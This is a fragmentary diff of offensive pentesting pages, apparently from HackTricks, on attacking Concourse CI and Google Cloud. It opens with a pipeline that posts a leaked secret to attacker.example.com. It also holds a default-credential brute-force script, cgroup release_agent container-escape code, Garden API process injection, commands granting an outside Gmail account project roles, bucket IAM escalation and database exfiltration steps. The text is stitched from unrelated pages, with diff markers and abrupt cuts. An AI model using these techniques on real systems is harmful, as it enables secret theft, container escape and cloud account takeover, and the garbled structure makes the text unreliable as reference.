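            LEAKED: ((target-secret))   # resolved by the credential manager at runtime
          run:
            path: sh
            args:
              - -cx
              - wget -q -O- --post-data="$LEAKED" http://attacker.example.com/ || echo "$LEAKED" | base64
```

Deploy and trigger it with `fly -t <target> set-pipeline -p leak -c pipeline.yml`, `fly -t <target> unpause-pipeline -p leak`, and read the output with `fly -t <target> watch -j leak/leak-secret`.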
# Concourse Enumeration

In order to enumerate a concourse environment you first need to **gather valid credentials** or find an **authentication token**, probably in a `.flyrc` config file.
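A quick check for leftover tokens in the default `fly` config location:

```bash
# fly saves each target (API URL, team and bearer token) in ~/.flyrc
cat "$HOME/.flyrc" 2>/dev/null || echo "no .flyrc found"
```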
## Login and Current User enum
* To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**:
  * `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
@ -93,7 +91,7 @@ In order to enumerate a concourse environment you first need to **gather valid c
* Get **role** of the user against the indicated target:
  * `fly -t <target> userinfo`

## Teams & Users

* Get a list of the Teams
  * `fly -t <target> teams`
@ -102,7 +100,7 @@ In order to enumerate a concourse environment you first need to **gather valid c
* Get a list of users
  * `fly -t <target> active-users`

## Pipelines

* **List** pipelines:
  * `fly -t <target> pipelines -a`
@ -125,7 +123,7 @@ cat /tmp/secrets.txt | sort | uniq
rm /tmp/secrets.txt
```

## Containers & Workers

* List **workers**:
  * `fly -t <target> workers`
@ -134,18 +132,18 @@ rm /tmp/secrets.txt
* List **builds** (to see what is running):
  * `fly -t <target> builds`

# Concourse Attacks

## Credentials Brute-Force

* admin:admin
* test:test
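A minimal sketch to try those defaults against `fly login` (the endpoint URL and target alias are placeholders; `fly` must be installed, and `-u`/`-p` work for local-user auth):

```bash
#!/bin/sh
# Hypothetical Concourse endpoint - replace with the real one.
TARGET_URL="https://ci.example.com"

for cred in admin:admin test:test; do
  user=${cred%%:*}
  pass=${cred#*:}
  echo "trying $user:$pass"
  # On success fly stores a token for the "brute" target in ~/.flyrc
  fly -t brute login -c "$TARGET_URL" -u "$user" -p "$pass" >/dev/null 2>&1 \
    && echo "VALID: $cred" \
    || echo "failed: $user"
done
```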
## Secrets and params enumeration

In the previous section we saw how you can **get all the secret names and vars** used by the pipeline. The **vars might contain sensitive info** and the names of the **secrets will be useful later to try to steal** them.

## Session inside a running or recently run container

If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `<pipeline>/<job>` **container** using:
@ -160,7 +158,7 @@ With these permissions you might be able to:
* Try to **escape** to the node
* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible)

## Pipeline Creation/Modification

If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example:
@ -195,7 +193,7 @@ With the **modification/creation** of a new pipeline you will be able to:
* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node)
* **Delete** the created pipeline

## Execute Custom Task

This is similar to the previous method, but instead of modifying/creating a whole new pipeline you can **just execute a custom task** (which will probably be much **stealthier**):
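The `task_config.yml` used below can be as small as this sketch (the image and the `((some-secret))` reference are placeholder assumptions):

```yaml
platform: linux
image_resource:
  type: registry-image
  source:
    repository: busybox
params:
  SECRET: ((some-secret))   # hypothetical secret name to resolve and leak
run:
  path: sh
  args: ["-cx", "id; env"]
```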
@ -221,7 +219,7 @@ params:
fly -t tutorial execute --privileged --config task_config.yml
```

## Escaping to the node from a privileged task

In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex".
@ -241,20 +239,20 @@ echo 1 > /tmp/cgrp/x/notify_on_release
# The host path will look like the following, but you need to change it:
host_path="/mnt/vda1/hostpath-provisioner/default/concourse-work-dir-concourse-release-worker-0/overlays/ae7df0ca-0b38-4c45-73e2-a9388dcb2028/rootfs"

# The initial path "/mnt/vda1" is probably the same, but you can check it using the mount command:
#/dev/vda1 on /scratch type ext4 (rw,relatime)
#/dev/vda1 on /tmp/build/e55deab7 type ext4 (rw,relatime)
#/dev/vda1 on /etc/hosts type ext4 (rw,relatime)
#/dev/vda1 on /etc/resolv.conf type ext4 (rw,relatime)

# The next part "hostpath-provisioner/default/" is, I think, constant
# For the next part "concourse-work-dir-concourse-release-worker-0" you need to know how it's constructed
# "concourse-work-dir" is constant
# "concourse-release" is the concourse prefix of the current concourse env (you need to find it from the API)
# "worker-0" is the name of the worker the container is running in (it will usually be that one or incrementing the number)

# The final part "overlays/bbedb419-c4b2-40c9-67db-41977298d4b3/rootfs" is kind of constant
# running `mount | grep "on / " | grep -Eo "workdir=([^,]+)"` you will see something like:
# workdir=/concourse-work-dir/overlays/work/ae7df0ca-0b38-4c45-73e2-a9388dcb2028
# the UID is the part we are looking for
@ -289,7 +287,7 @@ cat /output
As you might have noticed, this is just a [**regular release\_agent escape**](../../linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md#privileged), just modifying the path of the cmd in the node
{% endhint %}

## Escaping to the node from a Worker container

A regular release\_agent escape with a minor modification is enough for this:
@ -320,7 +318,7 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
cat /output
```

## Escaping to the node from the Web container

Even if the web container has some defenses disabled, it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless).
@ -360,7 +358,7 @@ select * from teams; #Change the permissions of the users in the teams
select * from users;
```

## Abusing Garden Service - Not a real Attack

{% hint style="warning" %}
These are just some interesting notes about the service, but because it's only listening on localhost, these notes won't present any impact we haven't already exploited before
@ -392,7 +390,7 @@ In the previous section we saw how to escape from a privileged container, so if
Note that, playing with Concourse, I noticed that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside it.

### Getting inside a running privileged container
```bash
# Get current container
@ -404,7 +402,7 @@ curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/info
curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties

# Execute a new process inside a container
# In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
--header='Content-Type:application/json' \
'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
@ -413,7 +411,7 @@ wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],
nsenter --target 76011 --mount --uts --ipc --net --pid -- sh
```

### Creating a new privileged container

You can very easily create a new container (just run a random UID) and execute something on it:
@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>

# Testing Environment

## Running Concourse

### With Docker-Compose

This docker-compose file simplifies the installation to do some tests with concourse:
You can download the `fly` command line tool for your OS from the web interface at `127.0.0.1:8080`

### With Kubernetes (Recommended)

You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart).
' | kubectl apply -f -
```
## Create Pipeline

A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html), each of which contains an ordered list of [Steps](https://concourse-ci.org/steps.html).

## Steps

Several different types of steps can be used:
Each [step](https://concourse-ci.org/steps.html) in a job plan runs in its own container. Therefore, it's possible to indicate the type of container each step needs to be run in.

## Simple Pipeline Example

```yaml
jobs:
```

Check **127.0.0.1:8080** to see the pipeline flow.
## Bash script with output/input pipeline

It's possible to **save the results of one task in a file** and indicate that it's an output, and then indicate the input of the next task as the output of the previous task. What Concourse does is **mount the directory of the previous task in the new task, where you can access the files created by the previous task**.

## Triggers

You don't need to trigger the jobs manually every time you need to run them; you can also schedule them to run automatically:
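For comparison, a manual trigger with the `fly` CLI looks like this (reusing the `tutorial` target and the `pipe-name/simple` job from the example above):

```bash
PIPELINE=pipe-name
JOB=simple
# Kick off the job by hand and follow the resulting build
fly -t tutorial trigger-job --job "$PIPELINE/$JOB"
fly -t tutorial watch --job "$PIPELINE/$JOB"
```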
</details>

# Security concepts <a href="#security-concepts" id="security-concepts"></a>

## **Resource hierarchy**

Google Cloud uses a [Resource hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy) that is similar, conceptually, to that of a traditional filesystem. This provides a logical parent/child workflow with specific attachment points for policies and permissions.
A virtual machine (called a Compute Instance) is a resource. A resource resides in a project, probably alongside other Compute Instances, storage buckets, etc.

## **IAM Roles**

There are **three types** of roles in IAM:

There are thousands of permissions in GCP.

**You can find a** [**list of all the granular permissions here**](https://cloud.google.com/iam/docs/custom-roles-permissions-support)**.**
### Basic roles

| Name | Title | Permissions |
| ---- | ----- | ----------- |
Or to see the IAM policy assigned to a single Compute Instance:

```bash
gcloud compute instances get-iam-policy [INSTANCE] --zone [ZONE]
```
## **Organization Policies**

IAM policies indicate the permissions principals have over resources via roles, which are assigned granular permissions. Organization policies **restrict how those services can be used and which features are enabled or disabled**. This helps improve the least privilege of each resource in the GCP environment.
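To see which organization policies apply to a project you have access to, you can use `gcloud` (the project ID and the constraint name below are examples):

```bash
# List org-policy constraints set on the project
gcloud resource-manager org-policies list --project $PROJECT_ID
# Describe a specific constraint, e.g. whether service account key creation is disabled
gcloud resource-manager org-policies describe \
  constraints/iam.disableServiceAccountKeyCreation --project $PROJECT_ID
```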
## **Terraform IAM Policies, Bindings and Memberships**

As defined by terraform in [https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam), using terraform with GCP there are different ways to grant a principal access over a resource:

* **Bindings**: Several **principals can be bound to a role**. Those **principals can still be bound to or be members of other roles**. However, if a principal which isn't bound to the role is set as a **member of a bound role**, the next time the **binding is applied, the membership will disappear**.
* **Policies**: A policy is **authoritative**: it indicates roles and principals and then **those principals cannot have more roles and those roles cannot have more principals** unless the policy is modified (not even in other policies, bindings or memberships). Therefore, when a role or principal is specified in a policy, all its privileges are **limited by that policy**. Obviously, this can be bypassed if the principal is given the option to modify the policy or privilege escalation permissions (like creating a new principal and binding it to a new role).
## **Service accounts**

Virtual machine instances are usually **assigned a service account**. Every GCP project has a [default service account](https://cloud.google.com/compute/docs/access/service-accounts#default\_service\_account), and this will be assigned to new Compute Instances unless otherwise specified. Administrators can choose to use either a custom account or no account at all. This service account **can be used by any user or application on the machine** to communicate with the Google APIs. You can run the following command to see what accounts are available to you:

`SERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com`

If `gcloud auth list` returns **multiple** accounts **available**, something interesting is going on. You should generally see only the service account. If there is more than one, you can cycle through each using `gcloud config set account [ACCOUNT]` while trying the various tasks in this blog.
## **Access scopes**

The **service account** on a GCP Compute Instance will **use** **OAuth** to communicate with the Google Cloud APIs. When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the instance will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. This defines **what API endpoints it can authenticate to**. It does **NOT define the actual permissions**.
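From inside a compromised instance you can check those scopes via the standard metadata endpoint, with no extra tooling:

```bash
# Query the metadata server for the scopes baked into the default SA's token
curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes"
```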
This `cloud-platform` scope is what we are really hoping for, as it will allow us to use all of our assigned IAM permissions.

It is possible to encounter some **conflicts** when using both **IAM and access scopes**. For example, your service account may have the IAM role of `compute.instanceAdmin` but the instance you've breached has been crippled with the scope limitation of `https://www.googleapis.com/auth/compute.readonly`. This would prevent you from making any changes using the OAuth token that's automatically assigned to your instance.
## Default credentials <a href="#default-credentials" id="default-credentials"></a>

**Default service account token**

When using one of Google's official GCP client libraries, the code will automatically look for credentials to use (Application Default Credentials).

Finding the actual **JSON file with the service account credentials** is generally much **more** **desirable** than **relying on the OAuth token** on the metadata server. This is because the raw service account credentials can be activated **without the burden of access scopes** and without the short expiration period usually applied to the tokens.
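If you do find such a JSON key, you can load it into `gcloud` directly (the file path below is illustrative):

```bash
KEY_FILE=/path/to/sa-creds.json   # example path to a leaked service account key
# Authenticate as the service account with the raw key — no access-scope limitation applies
gcloud auth activate-service-account --key-file "$KEY_FILE"
gcloud auth list    # verify the new active account
```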
## **Networking**

Compute Instances are connected to networks called VPCs or [Virtual Private Clouds](https://cloud.google.com/vpc/docs/vpc). [GCP firewall](https://cloud.google.com/vpc/docs/firewalls) rules are defined at this network level but are applied individually to a Compute Instance. Every network, by default, has two [implied firewall rules](https://cloud.google.com/vpc/docs/firewalls#default\_firewall\_rules): allow outbound and deny inbound.

We've automated this completely using a python script which will export the following:

* nmap scan to target all instances on ports ingress allowed from the public internet (0.0.0.0/0)
* masscan to target the full TCP range of those instances that allow ALL TCP ports from the public internet (0.0.0.0/0)
# Enumeration

## Automatic Tools

* [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_enum): Bash script to enumerate a GCP environment using gcloud cli and saving the results in a file
* [https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation): Scripts to enumerate high IAM privileges and to escalate privileges in GCP abusing them (I couldn't get the enumeration script to run)
* [https://github.com/lyft/cartography](https://github.com/lyft/cartography): Tool to enumerate and print in a graph resources and relations of different cloud platforms
* [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec): This is a list of cloud security tools
## IAM

| Description | Command |
| ----------- | ------- |
| List **custom** **roles** on a project | `gcloud iam roles list --project $PROJECT_ID` |
| List **service accounts** | `gcloud iam service-accounts list` |
# Unauthenticated Attacks

{% content-ref url="gcp-buckets-brute-force-and-privilege-escalation.md" %}
[gcp-buckets-brute-force-and-privilege-escalation.md](gcp-buckets-brute-force-and-privilege-escalation.md)
{% endcontent-ref %}

### Phishing

You could **OAuth phish** a user with high privileges.

### Dorks

* **Github**: auth\_provider\_x509\_cert\_url extension:json
# Generic GCP Security Checklists

* [Google Cloud Computing Platform CIS Benchmark](https://www.cisecurity.org/cis-benchmarks/)
* [https://github.com/doitintl/secure-gcp-reference](https://github.com/doitintl/secure-gcp-reference)

# Local Privilege Escalation / SSH Pivoting

Supposing that you have compromised a VM in GCP, there are some **GCP privileges** that can allow you to **escalate privileges locally, into other machines and also pivot to other VMs**:
If you have found some [**SSRF vulnerability in a GCP environment, check this page**](../../pentesting-web/ssrf-server-side-request-forgery/#6440).

# GCP Post Exploitation <a href="#cloud-privilege-escalation" id="cloud-privilege-escalation"></a>

## GCP Interesting Permissions <a href="#organization-level-iam-permissions" id="organization-level-iam-permissions"></a>

The most common approach once you have obtained some cloud credentials or have compromised some service running inside a cloud is to **abuse misconfigured privileges** the compromised account may have. So, the first thing you should do is enumerate your privileges.
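One way to enumerate them is the Resource Manager `testIamPermissions` endpoint, which tells you which of a list of candidate permissions your current identity actually holds (the project ID and the permission list below are examples):

```bash
PROJECT=my-project        # example project ID
TOKEN=$(gcloud auth print-access-token)
# Ask Resource Manager which of these permissions the current identity actually has
curl -s -X POST "https://cloudresourcemanager.googleapis.com/v1/projects/$PROJECT:testIamPermissions" \
  -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \
  -d '{"permissions":["compute.instances.list","iam.serviceAccounts.getAccessToken","storage.buckets.list"]}'
```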
Moreover, during this enumeration, remember that **permissions can be set at the organization, folder, project and resource level**.

{% content-ref url="gcp-interesting-permissions/" %}
[gcp-interesting-permissions](gcp-interesting-permissions/)
{% endcontent-ref %}
## Bypassing access scopes <a href="#bypassing-access-scopes" id="bypassing-access-scopes"></a>

When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the computing instance (VM) will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. However, you might be able to **bypass** this limitation and exploit the permissions the compromised account has.

```bash
curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=$TOKEN
```

You should see `https://www.googleapis.com/auth/cloud-platform` listed in the scopes, which means you are **not limited by any instance-level access scopes**. You now have full power to use all of your assigned IAM permissions.
## Service account impersonation <a href="#service-account-impersonation" id="service-account-impersonation"></a>

Impersonating a service account can be very useful to **obtain new and better privileges**.

There are three ways in which you can impersonate another service account:

* Authorization **using Cloud IAM policies** (covered [here](broken-reference/))
* **Deploying jobs on GCP services** (more applicable to the compromise of a user account)
## Granting access to management console <a href="#granting-access-to-management-console" id="granting-access-to-management-console"></a>

Access to the [GCP management console](https://console.cloud.google.com) is **provided to user accounts, not service accounts**. To log in to the web interface, you can **grant access to a Google account** that you control. This can be a generic "**@gmail.com**" account, it does **not have to be a member of the target organization**.
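A sketch of the grant itself — the Gmail address is an attacker-controlled example and the role is just one illustrative choice:

```bash
MEMBER="user:attacker@gmail.com"   # external Google account you control (example address)
ROLE="roles/editor"                # example role; pick the most powerful one you can bind
# Bind the external account to the role on the project
gcloud projects add-iam-policy-binding $PROJECT_ID --member "$MEMBER" --role "$ROLE"
```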
If you succeeded here, try **accessing the web interface** and exploring from there.

This is the **highest level you can assign using the gcloud tool**.

## Spreading to Workspace via domain-wide delegation of authority <a href="#spreading-to-g-suite-via-domain-wide-delegation-of-authority" id="spreading-to-g-suite-via-domain-wide-delegation-of-authority"></a>

[**Workspace**](https://gsuite.google.com) is Google's **collaboration and productivity platform** which consists of things like Gmail, Google Calendar, Google Drive, Google Docs, etc.

However, it's possible to **give** a service account **permissions** over a Workspace account.

To create this relation it's needed to **enable it in GCP and also in Workspace**.
### Test Workspace access

To test this access you'll need the **service account credentials exported in JSON** format. You may have acquired these in an earlier step, or you may have the access required now to create a key for a service account you know to have domain-wide delegation enabled.

You can try this script across a range of email addresses to impersonate **various users**.

If you have success creating a new admin account, you can log on to the [Google admin console](https://admin.google.com) and have full control over everything in G Suite for every user - email, docs, calendar, etc. Go wild.

## Looting

Another promising way to **escalate privileges inside the cloud is to enumerate as much sensitive information as possible** from the services that are being used. Here you can find some enumeration recommendations for some GCP services, but more could be used, so feel free to submit PRs indicating ways to enumerate more services:
There is a gcloud API endpoint that aims to **list all the resources the accessible account has access to**.

{% content-ref url="gcp-looting.md" %}
[gcp-looting.md](gcp-looting.md)
{% endcontent-ref %}

## Persistence

{% content-ref url="gcp-persistance.md" %}
[gcp-persistance.md](gcp-persistance.md)
{% endcontent-ref %}
# Capture gcloud, gsutil... network

```bash
gcloud config set proxy/address 127.0.0.1

# (revert afterwards)
gcloud config unset auth/disable_ssl_validation
gcloud config unset core/custom_ca_certs_file
```
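A fuller version of that interception setup might look like this (the property names are real `gcloud config` properties; the port and CA path are examples for a local Burp/mitmproxy listener):

```bash
PORT=8080                                  # example local proxy port
gcloud config set proxy/type http
gcloud config set proxy/address 127.0.0.1
gcloud config set proxy/port "$PORT"
# Either trust the proxy's CA certificate... (path is an example)
gcloud config set core/custom_ca_certs_file ~/.mitmproxy/mitmproxy-ca-cert.pem
# ...or (less safe) disable TLS validation entirely
gcloud config set auth/disable_ssl_validation True
```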
# References

* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
</details>
# Public Assets Discovery

One way to discover public cloud resources that belong to a company is to scrape their websites looking for them. Tools like [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) will scrape the web and search for **links to public cloud resources** (in this case this tool searches `['amazonaws.com', 'digitaloceanspaces.com', 'windows.net', 'storage.googleapis.com', 'aliyuncs.com']`)

Note that other cloud resources could be searched for, and that sometimes these resources are hidden behind **subdomains pointing to them via CNAME records**.
# Public Resources Brute-Force

## Buckets, Firebase, Apps & Cloud Functions

* [https://github.com/initstring/cloud\_enum](https://github.com/initstring/cloud\_enum): In GCP, this tool brute-forces Buckets, Firebase Realtime Databases, Google App Engine sites, and Cloud Functions
* [https://github.com/0xsha/CloudBrute](https://github.com/0xsha/CloudBrute): In GCP, this tool brute-forces Buckets and Apps.

## Buckets

As other clouds, GCP also offers Buckets to its users. These buckets might be misconfigured to grant public access (to list the content, read, write...).
The following tools can be used to generate variations of the given name and search for misconfigured buckets with those names:

* [https://github.com/RhinoSecurityLabs/GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute)

# Privilege Escalation

If the bucket policy allows either “allUsers” or “allAuthenticatedUsers” to **write to the bucket policy** (the **storage.buckets.setIamPolicy** permission)**,** then anyone can modify the bucket policy and grant themselves full access.
## Check Permissions

There are 2 ways to check the permissions over a bucket. The first one is to ask for them by making a request to `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam` or running `gsutil iam get gs://BUCKET_NAME`.

@@ -53,7 +52,7 @@ However, if your user (potentially belonging to allUsers or allAuthenticatedUser

The other option, which will always work, is to use the testPermissions endpoint of the bucket to figure out if you have the specified permission, for example accessing: `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update`
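A quick sketch of how that testPermissions URL can be assembled for an arbitrary permission list (`example-bucket` is a placeholder for the target bucket):

```bash
BUCKET="example-bucket"   # placeholder, use the bucket you are testing
QS=""
for p in storage.buckets.delete storage.buckets.setIamPolicy storage.objects.list; do
  QS="${QS}&permissions=${p}"
done
URL="https://www.googleapis.com/storage/v1/b/${BUCKET}/iam/testPermissions?${QS#&}"
echo "$URL"
# curl -s "$URL"                                      # permissions of an anonymous user
# curl -s -H "Authorization: Bearer $TOKEN" "$URL"    # permissions of your identity
```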
## Escalating

With the “gsutil” Google Storage CLI program, we can run the following command to grant “allAuthenticatedUsers” access to the “Storage Admin” role, thus **escalating the privileges we were granted** to the bucket:
@@ -63,7 +62,7 @@ gsutil iam ch group:allAuthenticatedUsers:admin gs://BUCKET_NAME

One of the main attractions of escalating from a LegacyBucketOwner to Storage Admin is the ability to use the “storage.buckets.delete” privilege. In theory, you could **delete the bucket after escalating your privileges, then create the bucket in your own account to steal the name**.

# References

* [https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/](https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/)
View file
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

</details>
# GCP - Buckets Enumeration
Default configurations permit read access to storage. This means that you may **enumerate ALL storage buckets in the project**, including **listing** and **accessing** the contents inside.

This can be a MAJOR vector for privilege escalation, as those buckets can contain secrets.
@@ -48,19 +46,19 @@ If you get a permission denied error listing buckets you may still have access t

for i in $(cat wordlist.txt); do gsutil ls -r gs://"$i"; done
```
## Search Open Buckets

With the following script [gathered from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_misc/-/blob/master/find\_open\_buckets.sh) you can find all the open buckets:
```bash
#!/bin/bash

############################
# Run this tool to find buckets that are open to the public anywhere
# in your GCP organization.
#
# Enjoy!
############################

for proj in $(gcloud projects list --format="get(projectId)"); do
  echo "[*] scraping project $proj"
View file
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

</details>
# Compute instances
It would be interesting if you can **get the zones** the project is using and the **list of all the running instances** and details about each of them.
@@ -33,7 +31,7 @@ The details may include:

```bash
# Get list of zones
# It's interesting to know which zones are being used
gcloud compute regions list | grep -E "NAME|[^0]/"

# List compute instances & get info
@@ -53,7 +51,7 @@ For more information about how to **SSH** or **modify the metadata** of an insta

[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md)
{% endcontent-ref %}

## Custom Metadata

Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the instance and project level. This is simply a way to pass **arbitrary key/value pairs into an instance**, and is commonly used for environment variables and startup/shutdown scripts. This can be obtained using the `describe` method from a command in the previous section, but it could also be retrieved from inside the instance by accessing the metadata endpoint.
@@ -67,7 +65,7 @@ curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?re

-H "Metadata-Flavor: Google"
```
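As a sketch, the loop below only prints curl commands for a few common metadata paths (the path list is an illustrative subset, and the printed commands will only return data when run from inside an instance):

```bash
MD="http://metadata.google.internal/computeMetadata/v1"
for path in instance/attributes project/attributes instance/service-accounts; do
  # Print, rather than execute, the query so it can be reviewed offline
  echo "curl -s -H 'Metadata-Flavor: Google' '${MD}/${path}/?recursive=true&alt=text'"
done
```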
## Serial Console Logs

Compute instances may be **writing output from the OS and BIOS to serial ports**. Serial console logs may expose **sensitive information** from the system logs which low-privileged users may not usually see, but with the appropriate IAM permissions you may be able to read them.
@@ -91,7 +89,7 @@ You can then [export](https://cloud.google.com/sdk/gcloud/reference/compute/imag

$ gcloud compute images list --no-standard-images
```
## Local Privilege Escalation and Pivoting

If you compromise a compute instance you should also check the actions mentioned in this page:
@@ -99,9 +97,9 @@ If you compromises a compute instance you should also check the actions mentione

[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md)
{% endcontent-ref %}
# Images

## Custom Images

**Custom compute images may contain sensitive details** or other vulnerable configurations that you can exploit. You can query the list of non-standard images in a project with the following command:
@@ -127,7 +125,7 @@ gcloud compute images list --project windows-cloud --no-standard-images #non-Shi

gcloud compute images list --project gce-uefi-images --no-standard-images #available Shielded VM images, including Windows images
```
## Custom Instance Templates

An [instance template](https://cloud.google.com/compute/docs/instance-templates/) defines instance properties to help deploy consistent configurations. These may contain the same types of sensitive data as a running instance's custom metadata. You can use the following commands to investigate:
@@ -139,7 +137,7 @@ $ gcloud compute instance-templates list

$ gcloud compute instance-templates describe [TEMPLATE NAME]
```
# More Enumeration

| Description | Command |
| ---------------------- | --------------------------------------------------------------------------------------------------------- |
View file
@@ -17,15 +17,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

</details>
# GCP - Databases Enumeration
Google has [a handful of database technologies](https://cloud.google.com/products/databases/) that you may have access to via the default service account or another set of credentials you have compromised thus far.

Databases will usually contain interesting information, so it is highly recommended to check them. Each database type provides various **`gcloud` commands to export the data**. This typically involves **writing the database to a cloud storage bucket first**, which you can then download. It may be best to use an existing bucket you already have access to, but you can also create your own if you want.

As an example, you can follow [Google's documentation](https://cloud.google.com/sql/docs/mysql/import-export/exporting) to exfiltrate a Cloud SQL database.
## [Cloud SQL](https://cloud.google.com/sdk/gcloud/reference/sql/)

Cloud SQL instances are **fully managed, relational MySQL, PostgreSQL and SQL Server databases**. Google handles replication, patch management and database management to ensure availability and performance. [Learn more](https://cloud.google.com/sql/docs/)
@@ -39,7 +37,7 @@ gcloud sql backups list --instance [INSTANCE]

gcloud sql export sql <DATABASE_INSTANCE> gs://<CLOUD_STORAGE_BUCKET>/cloudsql/export.sql.gz --database <DATABASE_NAME>
```
## [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/)

Fully managed relational database with unlimited scale, strong consistency, and up to 99.999% availability.
@@ -50,7 +48,7 @@ gcloud spanner databases list --instance [INSTANCE]

gcloud spanner backups list --instance [INSTANCE]
```
## [Cloud Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/) <a href="#cloud-bigtable" id="cloud-bigtable"></a>

A fully managed, scalable NoSQL database service for large analytical and operational workloads with up to 99.999% availability. [Learn more](https://cloud.google.com/bigtable).
@@ -61,7 +59,7 @@ gcloud bigtable clusters list

gcloud bigtable backups list --instance [INSTANCE]
```
## [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/)

Cloud Firestore is a flexible, scalable database for mobile, web, and server development from Firebase and Google Cloud. Like Firebase Realtime Database, it keeps your data in sync across client apps through realtime listeners and offers offline support for mobile and web so you can build responsive apps that work regardless of network latency or Internet connectivity. Cloud Firestore also offers seamless integration with other Firebase and Google Cloud products, including Cloud Functions. [Learn more](https://firebase.google.com/docs/firestore).
@@ -71,11 +69,11 @@ gcloud firestore indexes fields list

gcloud firestore export gs://my-source-project-export/export-20190113_2109 --collection-ids='cameras','radios'
```
## [Firebase](https://cloud.google.com/sdk/gcloud/reference/firebase/)

The Firebase Realtime Database is a cloud-hosted NoSQL database that lets you store and sync data between your users in realtime. [Learn more](https://firebase.google.com/products/realtime-database/).
## Memorystore

Reduce latency with a scalable, secure, and highly available in-memory service for [**Redis**](https://cloud.google.com/sdk/gcloud/reference/redis) and [**Memcached**](https://cloud.google.com/sdk/gcloud/reference/memcache). Learn more.
@@ -87,7 +85,7 @@ gcloud redis instances list --region [region]

gcloud redis instances export gs://my-bucket/my-redis-instance.rdb my-redis-instance --region=us-central1
```
## [Bigquery](https://cloud.google.com/bigquery/docs/bq-command-line-tool)

BigQuery is a fully-managed enterprise data warehouse that helps you manage and analyze your data with built-in features like machine learning, geospatial analysis, and business intelligence. BigQuery’s serverless architecture lets you use SQL queries to answer your organization’s biggest questions with zero infrastructure management. BigQuery’s scalable, distributed analysis engine lets you query terabytes in seconds and petabytes in minutes. [Learn more](https://cloud.google.com/bigquery/docs/introduction).
View file
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

</details>
# Introduction to GCP Privilege Escalation <a href="#introduction-to-gcp-privilege-escalation" id="introduction-to-gcp-privilege-escalation"></a>
